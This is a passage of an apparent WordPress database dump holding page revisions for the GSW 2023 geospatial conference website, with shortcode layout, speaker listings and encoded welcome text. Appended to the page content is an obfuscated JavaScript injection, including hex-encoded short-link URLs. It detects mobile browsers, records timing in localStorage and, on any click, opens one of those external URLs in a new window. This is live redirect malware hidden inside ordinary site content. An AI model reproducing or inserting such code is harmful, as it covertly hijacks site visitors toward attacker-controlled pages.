Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:14:04','2022-10-07 13:14:04','',2167,'https://gsw2023.com/?p=2391',0,'revision','',0),
(2392,1,'2022-10-07 13:14:04','2022-10-07 13:14:04','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 13:14:04','2022-10-07 13:14:04','',2167,'https://gsw2023.com/?p=2392',0,'revision','',0),
(2393,1,'2022-10-07 13:14:05','2022-10-07 13:14:05','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of 